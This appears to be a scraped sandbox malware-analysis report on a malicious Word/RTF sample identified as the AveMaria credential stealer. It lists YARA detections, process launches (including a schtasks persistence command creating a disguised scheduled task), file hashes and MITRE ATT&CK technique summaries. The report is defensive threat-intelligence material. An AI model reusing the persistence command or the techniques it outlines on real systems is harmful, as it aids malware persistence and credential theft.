Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446591152.00000000023F3000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 31%, ReversingLabs
Reputation:	low

Analysis Process: schtasks.exe PID: 1992 Parent PID: 2832

General

Start time:	21:17:33
Start date:	28/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
Imagebase:	0xde0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: doc.exe PID: 1280 Parent PID: 2832

General

Start time:	21:17:34
Start date:	28/09/2021
Path:	C:\Users\user\AppData\Roaming\doc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\doc.exe
Imagebase:	0x200000
File size:	637440 bytes
MD5 hash:	D8BC91E846E3D624814D4557681F33AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: doc.exe PID: 1188 Parent PID: 2832

General

Start time:	21:17:34
Start date:	28/09/2021
Path:	C:\Users\user\AppData\Roaming\doc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\doc.exe
Imagebase:	0x200000
File size:	637440 bytes
MD5 hash:	D8BC91E846E3D624814D4557681F33AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: doc.exe PID: 1480 Parent PID: 2832

General

Start time:	21:17:35
Start date:	28/09/2021
Path:	C:\Users\user\AppData\Roaming\doc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\doc.exe
Imagebase:	0x200000
File size:	637440 bytes
MD5 hash:	D8BC91E846E3D624814D4557681F33AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000002.694590635.000000000054F000.00000040.00000001.sdmp, Author: Joe Security

Analysis Process: verclsid.exe PID: 1016 Parent PID: 2608

General

Start time:	21:17:43
Start date:	28/09/2021
Path:	C:\Windows\System32\verclsid.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Imagebase:	0xffeb0000
File size:	11776 bytes
MD5 hash:	3796AE13F680D9239210513EDA590E86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: notepad.exe PID: 2844 Parent PID: 2608

General

Start time:	21:17:45
Start date:	28/09/2021
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT'
Imagebase:	0xff7a0000
File size:	193536 bytes
MD5 hash:	B32189BDFF6E577A92BAA61AD49264E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report catalogue_2021_samples_list_revise_ol.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: AveMaria

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Data Obfuscation:

Jbx Signature Overview

AV Detection:

Cryptography:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre